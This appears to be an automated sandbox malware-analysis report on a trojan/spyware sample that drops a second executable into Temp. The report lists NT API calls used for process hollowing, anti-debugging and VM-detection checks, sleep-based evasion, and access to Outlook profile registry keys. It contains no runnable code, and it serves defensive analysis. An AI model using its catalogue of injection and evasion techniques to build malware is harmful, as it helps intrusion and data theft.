Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_00AF9660
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_00AF97A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk, 3_2_00AF9780
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9FE0 NtCreateMutant,LdrInitializeThunk, 3_2_00AF9FE0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk, 3_2_00AF9710
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF98A0 NtWriteVirtualMemory, 3_2_00AF98A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9820 NtEnumerateKey, 3_2_00AF9820
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AFB040 NtSuspendThread, 3_2_00AFB040
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF99D0 NtCreateProcessEx, 3_2_00AF99D0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9950 NtQueueApcThread, 3_2_00AF9950
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9A80 NtOpenDirectoryObject, 3_2_00AF9A80
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9A10 NtQuerySection, 3_2_00AF9A10
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AFA3B0 NtGetContextThread, 3_2_00AFA3B0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9B00 NtSetValueKey, 3_2_00AF9B00
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF95F0 NtQueryInformationFile, 3_2_00AF95F0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9520 NtWaitForSingleObject, 3_2_00AF9520
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AFAD30 NtSetContextThread, 3_2_00AFAD30
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9560 NtWriteFile, 3_2_00AF9560
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF96D0 NtCreateKey, 3_2_00AF96D0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9610 NtEnumerateValueKey, 3_2_00AF9610
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9670 NtQueryInformationProcess, 3_2_00AF9670
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9650 NtQueryValueKey, 3_2_00AF9650
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9730 NtQueryVirtualMemory, 3_2_00AF9730
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AFA710 NtOpenProcessToken, 3_2_00AFA710
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9760 NtOpenProcess, 3_2_00AF9760
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9770 NtSetInformationFile, 3_2_00AF9770
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AFA770 NtOpenThread, 3_2_00AFA770
Source: Lc8xQv8iZY.exe ReversingLabs: Detection: 48%
Source: Lc8xQv8iZY.exe Virustotal: Detection: 47%
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe File read: C:\Users\user\Desktop\Lc8xQv8iZY.exe Jump to behavior
Source: Lc8xQv8iZY.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Lc8xQv8iZY.exe C:\Users\user\Desktop\Lc8xQv8iZY.exe
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Process created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Process created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Process created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Process created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h Jump to behavior
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe File created: C:\Users\user\AppData\Local\Temp\nsaAF5E.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@9/7
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar, 0_2_00402036
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004043F5
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3748:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Command line argument: ^oA 1_2_00416EB0
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: wntdll.pdbUGP source: hvbvmxm.exe, 00000001.00000003.304073189.0000000002740000.00000004.00001000.00020000.00000000.sdmp, hvbvmxm.exe, 00000001.00000003.303031511.00000000028D0000.00000004.00001000.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.310467881.00000000008FC000.00000004.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.387087600.0000000000BAF000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.308974263.0000000000757000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.385661856.0000000000563000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000002.569002403.000000000320F000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.387371533.0000000000700000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: hvbvmxm.exe, hvbvmxm.exe, 00000003.00000003.310467881.00000000008FC000.00000004.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.387087600.0000000000BAF000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.308974263.0000000000757000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.385661856.0000000000563000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000002.569002403.000000000320F000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.387371533.0000000000700000.00000004.00000800.00020000.00000000.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040CC02 push cs; retf 0040h 1_2_0040CC21
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040AC96 push ecx; ret 1_2_0040ACA9
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_004210E9 push eax; ret 3_2_004210EF
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_004210F2 push eax; ret 3_2_00421159
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0042109C push eax; ret 3_2_004210EF
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00421153 push eax; ret 3_2_00421159
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0040EAA3 push ecx; retf 3_2_0040EAA6
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0041E5D0 push ecx; iretd 3_2_0041E5D2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00419F38 push edx; ret 3_2_00419F39
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0041FF93 push ebx; retf 3_2_0041FF94
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B0D0D1 push ecx; ret 3_2_00B0D0E4
Drops PE files
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe File created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Jump to dropped file
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5288 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\help.exe TID: 4464 Thread sleep time: -42000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE6A60 rdtscp 3_2_00AE6A60
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe API coverage: 6.8 %
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe API coverage: 9.3 %
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405620
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00405FF6 FindFirstFileA,FindClose, 0_2_00405FF6
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00402654 FindFirstFileA, 0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_00410370 FindFirstFileExW, 1_2_00410370
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000004.00000000.349521692.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.349893553.000000000834F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 00000004.00000000.317884001.00000000059F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: explorer.exe, 00000004.00000000.324860902.00000000085BD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.323779585.0000000008394000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.326086945.000000000CDC8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000004.00000000.350579899.000000000858E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.349521692.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040AA3F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040AA3F
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0041273A GetProcessHeap, 1_2_0041273A
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE6A60 rdtscp 3_2_00AE6A60
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0041141B mov eax, dword ptr fs:[00000030h] 1_2_0041141B
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040ED78 mov eax, dword ptr fs:[00000030h] 1_2_0040ED78
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_00B80019 mov eax, dword ptr fs:[00000030h] 1_2_00B80019
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_00B80005 mov eax, dword ptr fs:[00000030h] 1_2_00B80005
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_00B8007A mov eax, dword ptr fs:[00000030h] 1_2_00B8007A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_00B80149 mov eax, dword ptr fs:[00000030h] 1_2_00B80149
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF90AF mov eax, dword ptr fs:[00000030h] 3_2_00AF90AF
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE20A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE20A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE20A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE20A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE20A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE20A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEF0BF mov ecx, dword ptr fs:[00000030h] 3_2_00AEF0BF
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEF0BF mov eax, dword ptr fs:[00000030h] 3_2_00AEF0BF
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEF0BF mov eax, dword ptr fs:[00000030h] 3_2_00AEF0BF
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB9080 mov eax, dword ptr fs:[00000030h] 3_2_00AB9080
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B33884 mov eax, dword ptr fs:[00000030h] 3_2_00B33884
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B33884 mov eax, dword ptr fs:[00000030h] 3_2_00B33884
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB58EC mov eax, dword ptr fs:[00000030h] 3_2_00AB58EC
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h] 3_2_00AB40E1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h] 3_2_00AB40E1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h] 3_2_00AB40E1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00B4B8D0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4B8D0 mov ecx, dword ptr fs:[00000030h] 3_2_00B4B8D0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00B4B8D0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00B4B8D0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00B4B8D0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00B4B8D0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h] 3_2_00AE002D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h] 3_2_00AE002D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h] 3_2_00AE002D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h] 3_2_00AE002D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h] 3_2_00AE002D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h] 3_2_00ACB02A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h] 3_2_00ACB02A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h] 3_2_00ACB02A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h] 3_2_00ACB02A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h] 3_2_00B37016
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h] 3_2_00B37016
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h] 3_2_00B37016
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B84015 mov eax, dword ptr fs:[00000030h] 3_2_00B84015
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B84015 mov eax, dword ptr fs:[00000030h] 3_2_00B84015
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B72073 mov eax, dword ptr fs:[00000030h] 3_2_00B72073
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B81074 mov eax, dword ptr fs:[00000030h] 3_2_00B81074
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD0050 mov eax, dword ptr fs:[00000030h] 3_2_00AD0050
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD0050 mov eax, dword ptr fs:[00000030h] 3_2_00AD0050
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h] 3_2_00B351BE
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h] 3_2_00B351BE
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h] 3_2_00B351BE
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h] 3_2_00B351BE
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE61A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE61A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE61A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE61A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h] 3_2_00B749A4
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h] 3_2_00B749A4
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h] 3_2_00B749A4
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h] 3_2_00B749A4
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B369A6 mov eax, dword ptr fs:[00000030h] 3_2_00B369A6
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEA185 mov eax, dword ptr fs:[00000030h] 3_2_00AEA185
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADC182 mov eax, dword ptr fs:[00000030h] 3_2_00ADC182
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE2990 mov eax, dword ptr fs:[00000030h] 3_2_00AE2990
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h] 3_2_00ABB1E1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h] 3_2_00ABB1E1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h] 3_2_00ABB1E1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B441E8 mov eax, dword ptr fs:[00000030h] 3_2_00B441E8
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h] 3_2_00AD4120
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h] 3_2_00AD4120
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h] 3_2_00AD4120
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h] 3_2_00AD4120
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD4120 mov ecx, dword ptr fs:[00000030h] 3_2_00AD4120
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE513A mov eax, dword ptr fs:[00000030h] 3_2_00AE513A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE513A mov eax, dword ptr fs:[00000030h] 3_2_00AE513A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h] 3_2_00AB9100
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h] 3_2_00AB9100
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h] 3_2_00AB9100
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABC962 mov eax, dword ptr fs:[00000030h] 3_2_00ABC962
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABB171 mov eax, dword ptr fs:[00000030h] 3_2_00ABB171
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABB171 mov eax, dword ptr fs:[00000030h] 3_2_00ABB171
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADB944 mov eax, dword ptr fs:[00000030h] 3_2_00ADB944
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADB944 mov eax, dword ptr fs:[00000030h] 3_2_00ADB944
